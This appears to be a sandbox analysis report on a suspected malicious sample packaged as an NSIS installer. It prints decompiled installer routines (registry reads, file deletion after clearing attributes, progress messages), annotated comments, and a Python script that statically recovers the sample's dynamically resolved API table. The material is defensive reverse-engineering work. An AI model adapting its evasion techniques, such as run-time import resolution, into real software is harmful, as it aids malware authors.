                                                                                                            • Instruction ID: 20ca943cec1bfd02e9a7b8a7961d2af95be0026f17772609ad776ff58b8bf793
                                                                                                            • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                                            • Instruction Fuzzy Hash: 1601487254420EEFEB128F64EC48EEB3FACEF15394B004126FA04A6220D235D964CBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E00402482(int* __ebx, char* __esi) {
                                                                                                            				int _t8;
                                                                                                            				long _t11;
                                                                                                            				int* _t14;
                                                                                                            				void* _t18;
                                                                                                            				char* _t20;
                                                                                                            				void* _t22;
                                                                                                            				void* _t25;
                                                                                                            
                                                                                                            				_t20 = __esi;
                                                                                                            				_t14 = __ebx;
                                                                                                            				_t18 = E00402B44(_t25, 0x20019);
                                                                                                            				_t8 = E00402A1D(3);
                                                                                                            				 *__esi = __ebx;
                                                                                                            				if(_t18 == __ebx) {
                                                                                                            					L7:
                                                                                                            					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                            				} else {
                                                                                                            					 *(_t22 + 8) = 0x3ff;
                                                                                                            					if( *((intOrPtr*)(_t22 - 0x18)) == __ebx) {
                                                                                                            						_t11 = RegEnumValueA(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                                                            						__eflags = _t11;
                                                                                                            						if(_t11 != 0) {
                                                                                                            							goto L7;
                                                                                                            						} else {
                                                                                                            							goto L4;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						RegEnumKeyA(_t18, _t8, __esi, 0x3ff);
                                                                                                            						L4:
                                                                                                            						_t20[0x3ff] = _t14;
                                                                                                            						_push(_t18); // executed
                                                                                                            						RegCloseKey(); // executed
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t22 - 4));
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            0x00402482
                                                                                                            0x00402482
                                                                                                            0x0040248e
                                                                                                            0x00402490
                                                                                                            0x00402497
                                                                                                            0x00402499
                                                                                                            0x004026a6
                                                                                                            0x004026a6
                                                                                                            0x0040249f
                                                                                                            0x004024a7
                                                                                                            0x004024aa
                                                                                                            0x004024c3
                                                                                                            0x004024c9
                                                                                                            0x004024cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004024ac
                                                                                                            0x004024b0
                                                                                                            0x004024d1
                                                                                                            0x004024d1
                                                                                                            0x004024d7
                                                                                                            0x004024d8
                                                                                                            0x004024d8
                                                                                                            0x004024aa
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                            • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                                                            • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Enum$CloseOpenValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 167947723-0
                                                                                                            • Opcode ID: 06371cf6d5cd5c24906f8395af35970081992d6fcbf92cd5232b19a67d9e6aaa
                                                                                                            • Instruction ID: 651eecc7003a3be3ddeb342969b55079318d5f4ee149c111f32be82b22242bac
                                                                                                            • Opcode Fuzzy Hash: 06371cf6d5cd5c24906f8395af35970081992d6fcbf92cd5232b19a67d9e6aaa
                                                                                                            • Instruction Fuzzy Hash: 6FF0AD72A04200AFEB11AF659E88EBB7A6DEB40344B10443AF505A61C0D6B849459A7A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 41%
                                                                                                            			E00405589(void* __eflags, CHAR* _a4, signed int _a8) {
                                                                                                            				// File/directory delete helper. Layout and flag usage are consistent with the
                                                                                                            				// NSIS installer stub (editor's identification from the surrounding code, e.g. the
                                                                                                            				// nsq211B.tmp temp path below; not stated on this page). Reading of the arguments:
                                                                                                            				//   _a4 = path, _a8 = flags; bit 0x1 = target is a directory,
                                                                                                            				//   bit 0x4 = leave the attributes cleared when the delete fails.
                                                                                                            				int _t9;
                                                                                                            				long _t13;
                                                                                                            				CHAR* _t14;
                                                                                                            
                                                                                                            				_t14 = _a4;
                                                                                                            				// Subcall reads the attributes, clears them (SetFileAttributesA(path, 0), see APIs)
                                                                                                            				// and returns the old value, or 0xffffffff (INVALID_FILE_ATTRIBUTES) on error.
                                                                                                            				// Clearing read-only first is what lets the stub remove protected files.
                                                                                                            				_t13 = E0040597D(_t14);
                                                                                                            				if(_t13 == 0xffffffff) {
                                                                                                            					L8:
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_push(_t14); // path argument for the call below
                                                                                                            				if((_a8 & 0x00000001) == 0) {
                                                                                                            					_t9 = DeleteFileA(); // executed
                                                                                                            				} else {
                                                                                                            					_t9 = RemoveDirectoryA(); // executed
                                                                                                            				}
                                                                                                            				if(_t9 == 0) {
                                                                                                            					// Delete failed: put the original attributes back unless bit 0x4 is set.
                                                                                                            					if((_a8 & 0x00000004) == 0) {
                                                                                                            						SetFileAttributesA(_t14, _t13);
                                                                                                            					}
                                                                                                            					goto L8;
                                                                                                            				} else {
                                                                                                            					return 1; // success
                                                                                                            				}
                                                                                                            			}







                                                                                                            APIs
                                                                                                              • Part of subcall function 0040597D: GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                                                              • Part of subcall function 0040597D: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405996
                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,00405778), ref: 004055A4
                                                                                                            • DeleteFileA.KERNELBASE(?,?,?,00000000,00405778), ref: 004055AC
                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055C4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                            • String ID:
                                                                                                            • API String ID: 1655745494-0
                                                                                                            • Opcode ID: 17f562840c1773a82e66d36c699c3ba4858698b3520e1b3e97930180dfe60130
                                                                                                            • Instruction ID: ea226f21057ae85524c233b0e105864c274fd993d0d76b55d7ba08098a11cf89
                                                                                                            • Opcode Fuzzy Hash: 17f562840c1773a82e66d36c699c3ba4858698b3520e1b3e97930180dfe60130
                                                                                                            • Instruction Fuzzy Hash: DDE0E53152AB51AAD21057308C0CB5F2EEAEF86324F040A3AF552F21D4C37888468ABE
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403EED(int _a4) {
                                                                                                            				// Outer-window notification helper. 0x78 is the character 'x' (the String ID "x"
                                                                                                            				// listed under Similarity below); an 'x' notification bumps the counter at
                                                                                                            				// 0x42dbcc before the message is sent. Matches NSIS's outernotify(), where 'x'
                                                                                                            				// is the "quit" notification (editor's identification, not stated on this page).
                                                                                                            				long _t3;
                                                                                                            
                                                                                                            				if(_a4 == 0x78) {
                                                                                                            					 *0x42dbcc =  *0x42dbcc + 1;
                                                                                                            				}
                                                                                                            				// 0x408 == WM_USER + 8, a private message to the main window handle at *0x42e408.
                                                                                                            				_t3 = SendMessageA( *0x42e408, 0x408, _a4, 0); // executed
                                                                                                            				return _t3;
                                                                                                            			}





                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(00000408,?,00000000,00403B4F), ref: 00403F0B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: x
                                                                                                            • API String ID: 3850602802-2363233923
                                                                                                            • Opcode ID: 7a9f1fa3dd0be59651df54e26dfd36179d296c2ea1a6027e512c3cc900362168
                                                                                                            • Instruction ID: 0defc1578c0d95c91bb2a5b33422b57c17ce645d8d356cb5eaab9656918cdef7
                                                                                                            • Opcode Fuzzy Hash: 7a9f1fa3dd0be59651df54e26dfd36179d296c2ea1a6027e512c3cc900362168
                                                                                                            • Instruction Fuzzy Hash: BBC01231A44200AEEB215B00DE09F067A20FB64B03F208039F345290B5C2702422EB2D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 84%
                                                                                                            			E00402410(int* __ebx, char* __esi) {
                                                                                                            				// Registry read into a script variable (ReadRegStr / ReadRegDWORD style):
                                                                                                            				//   __esi = destination string buffer, __ebx = 0 (used as NULL and as terminator).
                                                                                                            				// Constants: 0x20019 == KEY_READ, 0x400 == 1024-byte buffer,
                                                                                                            				// value types 4 == REG_DWORD, 1 == REG_SZ, 2 == REG_EXPAND_SZ.
                                                                                                            				// The word at [_t37-0x18] selects the expected type (0 = string, non-zero = DWORD);
                                                                                                            				// a mismatch with the stored type is counted as an error.
                                                                                                            				void* _t17;
                                                                                                            				char* _t18;
                                                                                                            				long _t21;
                                                                                                            				int* _t27;
                                                                                                            				void* _t33;
                                                                                                            				char* _t35;
                                                                                                            				void* _t37; // frame pointer: locals below are addressed relative to it
                                                                                                            				void* _t40;
                                                                                                            
                                                                                                            				_t35 = __esi;
                                                                                                            				_t27 = __ebx;
                                                                                                            				_t17 = E00402B44(_t40, 0x20019); // executed: RegOpenKeyExA with KEY_READ (see APIs)
                                                                                                            				_t33 = _t17;
                                                                                                            				_t18 = E00402A3A(0x33); // value name, decoded from the installer's string block
                                                                                                            				 *__esi = __ebx; // start with an empty result
                                                                                                            				if(_t33 == __ebx) {
                                                                                                            					 *(_t37 - 4) = 1; // key could not be opened: flag an error
                                                                                                            				} else {
                                                                                                            					 *(_t37 - 0x34) = 0x400; // buffer size in/out
                                                                                                            					_t21 = RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x34); // executed; type lands at [_t37+8]
                                                                                                            					if(_t21 != 0) {
                                                                                                            						L7:
                                                                                                            						 *_t35 = _t27; // query failed or unsupported type: empty string, error
                                                                                                            						 *(_t37 - 4) = 1;
                                                                                                            					} else {
                                                                                                            						if( *(_t37 + 8) == 4) {
                                                                                                            							// REG_DWORD: error if a string read was requested; E00405C8D renders the
                                                                                                            							// DWORD in the buffer as a decimal string (assumed from its use here).
                                                                                                            							__eflags =  *(_t37 - 0x18) - __ebx;
                                                                                                            							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                                                                                            							E00405C8D(__esi,  *__esi);
                                                                                                            						} else {
                                                                                                            							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                                            								 *(_t37 - 4) =  *(_t37 - 0x18); // REG_SZ/REG_EXPAND_SZ: error only if a DWORD was requested
                                                                                                            								_t35[0x3ff] = _t27; // force NUL termination at the end of the 1024-byte buffer
                                                                                                            							} else {
                                                                                                            								goto L7;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_push(_t33); // executed
                                                                                                            					RegCloseKey(); // executed
                                                                                                            				}
                                                                                                            				 *0x42e488 =  *0x42e488 +  *(_t37 - 4); // accumulate into the global error counter
                                                                                                            				return 0;
                                                                                                            			}










                                                                                                            APIs
                                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                            • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 2fc456f067d7d2b16c5da38b508f8d43353395dda029af5291feda3b0f4e887d
                                                                                                            • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                                                            • Opcode Fuzzy Hash: 2fc456f067d7d2b16c5da38b508f8d43353395dda029af5291feda3b0f4e887d
                                                                                                            • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 59%
                                                                                                            			E00401389(signed int _a4) {
                                                                                                            				// Script-engine loop: walks a table of 0x1c-byte entries (base at *0x42e430)
                                                                                                            				// starting at index _a4, runs each entry through E00401434 and follows the
                                                                                                            				// jump it returns, while updating a progress bar. Consistent with NSIS's
                                                                                                            				// ExecuteCodeSegment() (editor's identification, not stated on this page).
                                                                                                            				intOrPtr* _t6;
                                                                                                            				void* _t8;
                                                                                                            				void* _t10;
                                                                                                            				signed int _t11;
                                                                                                            				void* _t12;
                                                                                                            				signed int _t16;
                                                                                                            				signed int _t17;
                                                                                                            				void* _t18; // frame pointer of the caller's context; holds the progress window handle
                                                                                                            
                                                                                                            				_t17 = _a4;
                                                                                                            				while(_t17 >= 0) {
                                                                                                            					_t6 = _t17 * 0x1c +  *0x42e430;
                                                                                                            					if( *_t6 == 1) { // opcode 1 ends the segment (a "return" entry)
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					_push(_t6); // executed
                                                                                                            					_t8 = E00401434(); // executed: run one entry, get the next-entry selector
                                                                                                            					if(_t8 == 0x7fffffff) { // error sentinel, propagated to the caller
                                                                                                            						return 0x7fffffff;
                                                                                                            					}
                                                                                                            					_t10 = E0040136D(_t8); // resolve an indirect target; 0 means "fall through"
                                                                                                            					if(_t10 != 0) {
                                                                                                            						_t11 = _t10 - 1; // targets are 1-based entry indices
                                                                                                            						_t16 = _t17;
                                                                                                            						_t17 = _t11;
                                                                                                            						_t12 = _t11 - _t16; // signed distance moved; negative on a backward jump
                                                                                                            					} else {
                                                                                                            						_t12 = _t10 + 1; // one step forward
                                                                                                            						_t17 = _t17 + 1;
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) { // a progress window is present
                                                                                                            						 *0x42dbec =  *0x42dbec + _t12; // running position, credited with the distance moved
                                                                                                            						// 0x402 == PBM_SETPOS (WM_USER + 2); 0x7530 == 30000 is the bar's range,
                                                                                                            						// *0x42dbd4 the divisor the position is scaled against.
                                                                                                            						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42dbec, 0x7530,  *0x42dbd4), 0); // executed
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                            • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                                                            • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                            • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 50%
                                                                                                            			E0040501A(signed int __eax) {
                                                                                                            				intOrPtr _v0;
                                                                                                            				intOrPtr _t10;
                                                                                                            				intOrPtr _t11;
                                                                                                            				intOrPtr* _t12;
                                                                                                            
                                                                                                            				_t11 =  *0x42e428;
                                                                                                            				_t10 =  *0x42e42c;
                                                                                                            				__imp__OleInitialize(0);
                                                                                                            				 *0x42e4b8 =  *0x42e4b8 | __eax;
                                                                                                            				E00403F60(0);
                                                                                                            				if(_t10 != 0) {
                                                                                                            					_t12 = _t11 + 0xc;
                                                                                                            					while(1) {
                                                                                                            						_t10 = _t10 - 1;
                                                                                                            						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_t12 = _t12 + 0x418;
                                                                                                            						if(_t10 != 0) {
                                                                                                            							continue;
                                                                                                            						} else {
                                                                                                            						}
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            					 *0x42e48c =  *0x42e48c + 1;
                                                                                                            				}
                                                                                                            				L7:
                                                                                                            				E00403F60(0x404); // executed
                                                                                                            				__imp__OleUninitialize(); // executed
                                                                                                            				return  *0x42e48c;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040502A
                                                                                                              • Part of subcall function 00403F60: SendMessageA.USER32(0008003A,00000000,00000000,00000000), ref: 00403F72
                                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 00405076
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2896919175-0
                                                                                                            • Opcode ID: 24ebda43c93c3a0e79a2719f9d73c458f4bc0a47607411017357536a7f3aecb3
                                                                                                            • Instruction ID: 3bb1638c4cb192e16dfd02cc67da28ccb22f822f40d61e8a5dd6919248452ec0
                                                                                                            • Opcode Fuzzy Hash: 24ebda43c93c3a0e79a2719f9d73c458f4bc0a47607411017357536a7f3aecb3
                                                                                                            • Instruction Fuzzy Hash: 79F02473A041018BE3616B259C00B5B77A0EB88301F14003AFE44732E1DA3A59028AAE
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004060C8(signed int _a4) {
                                                                                                            				struct HINSTANCE__* _t5;
                                                                                                            				signed int _t10;
                                                                                                            
                                                                                                            				_t10 = _a4 << 3;
                                                                                                            				_t8 =  *(_t10 + 0x409240);
                                                                                                            				_t5 = GetModuleHandleA( *(_t10 + 0x409240));
                                                                                                            				if(_t5 != 0) {
                                                                                                            					L2:
                                                                                                            					return GetProcAddress(_t5,  *(_t10 + 0x409244));
                                                                                                            				}
                                                                                                            				_t5 = E0040605A(_t8); // executed
                                                                                                            				if(_t5 == 0) {
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				goto L2;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                              • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32 ref: 00406071
                                                                                                              • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                                              • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp
• Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp
• Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2547128583-0
                                                                                                            • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                            • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                                                            • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                            • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%
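The function E004060C8 above is the run-time import resolver behind the report's "Contains functionality to dynamically determine API calls" signature: it shifts the caller's index left by three, reads a module-name pointer at 0x409240 + index*8 and a procedure-name pointer four bytes after it, asks GetModuleHandleA for the module (falling back to E0040605A, which builds a path under the system directory with wsprintfA and calls LoadLibraryExA), and finally calls GetProcAddress. Because the table is static data in the image, the (module, procedure) pairs can be recovered from the memory dump without executing the sample. The Python script below is an added example written for this page; it is not part of the sandbox report or of the sample. It reproduces the table walk on a constructed image laid out as the listing describes. The image base 0x400000 is taken from the report; the entry count, the image size and the string contents are assumptions (the listing shows no terminator, so the caller must supply the count).

```python
import struct

# From the report: the dump is mapped at image base 0x400000, and E004060C8
# indexes a table at 0x409240 with (index << 3). Each 8-byte entry holds a
# pointer to a module-name string followed by a pointer to a procedure-name string.
IMAGE_BASE = 0x00400000
TABLE_VA = 0x00409240
ENTRY_SIZE = 8


def va_to_off(va):
    """Translate a virtual address into an offset in the flat image buffer."""
    return va - IMAGE_BASE


def read_cstr(image, va):
    """Read a NUL-terminated ASCII string located at virtual address va."""
    start = va_to_off(va)
    end = image.index(b"\x00", start)
    return image[start:end].decode("ascii")


def resolve_entry(image, index):
    """Static counterpart of E004060C8(index): return (module, procedure)
    instead of calling GetModuleHandleA / LoadLibraryExA / GetProcAddress."""
    off = va_to_off(TABLE_VA) + (index << 3)          # same index << 3 as the listing
    mod_ptr, proc_ptr = struct.unpack_from("<II", image, off)
    return read_cstr(image, mod_ptr), read_cstr(image, proc_ptr)


def resolve_table(image, count):
    """Resolve entries 0..count-1; count is an assumption, the listing has no terminator."""
    return [resolve_entry(image, i) for i in range(count)]


def build_sample_image(entries):
    """Constructed test image (not the sample's real bytes): the table is placed
    at TABLE_VA and the strings immediately after it, so the script runs offline."""
    image = bytearray(0xA000)                          # assumed size, covers 0x409240
    str_va = TABLE_VA + ENTRY_SIZE * len(entries)
    table_off = va_to_off(TABLE_VA)
    for i, (mod, proc) in enumerate(entries):
        ptrs = []
        for text in (mod, proc):
            data = text.encode("ascii") + b"\x00"
            off = va_to_off(str_va)
            image[off:off + len(data)] = data
            ptrs.append(str_va)
            str_va += len(data)
        struct.pack_into("<II", image, table_off + i * ENTRY_SIZE, *ptrs)
    return bytes(image)


# Constructed entries; the names are APIs that appear in this report, the
# ordering is invented for the example.
SAMPLE_ENTRIES = [
    ("KERNEL32.dll", "LoadLibraryExA"),
    ("USER32.dll", "wsprintfA"),
    ("OLE32.dll", "OleInitialize"),
]
SAMPLE_IMAGE = build_sample_image(SAMPLE_ENTRIES)

if __name__ == "__main__":
    for i, (mod, proc) in enumerate(resolve_table(SAMPLE_IMAGE, len(SAMPLE_ENTRIES))):
        print(f"[{i}] {mod}!{proc}")
```

To apply this to the real dumps, the region files listed under "Memory Dump Source" would have to be placed at their base addresses in one buffer first (the table at 0x409240 lies in the region dumped at 0x409000, while the strings it points to may sit in another region); that stitching step is not shown here. The count argument has to come from the call sites of E004060C8, since the resolver itself never checks a bound.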

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004028AA(signed int __eax) {
                                                                                                            				RECT* _t10;
                                                                                                            				signed int _t12;
                                                                                                            				void* _t16;
                                                                                                            
                                                                                                            				_t12 =  *0x42a868; // 0x1
                                                                                                            				SendMessageA( *(_t16 - 8), 0xb, _t12 & __eax, _t10); // executed
                                                                                                            				if( *((intOrPtr*)(_t16 - 0x28)) != _t10) {
                                                                                                            					InvalidateRect( *(_t16 - 8), _t10, _t10);
                                                                                                            				}
                                                                                                            				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t16 - 4));
                                                                                                            				return 0;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,0000000B,00000001), ref: 004028B9
                                                                                                            • InvalidateRect.USER32(?), ref: 004028C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InvalidateMessageRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 909852535-0
                                                                                                            • Opcode ID: aeb50c85f6bd4643b9d68925b2460725ce61c84df534f36f5868be4476b80fa0
                                                                                                            • Instruction ID: be23d6fc8d776c2babc1d674e4d633496abb7596598885af0ff4512d456a32a5
                                                                                                            • Opcode Fuzzy Hash: aeb50c85f6bd4643b9d68925b2460725ce61c84df534f36f5868be4476b80fa0
                                                                                                            • Instruction Fuzzy Hash: 8EE08C72B00008AFEB11DF94EC849AEBBB9EB40319F10003AF202B10A0D3301C52EA38
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

APIs
• ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DD4
• KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 00401DDF
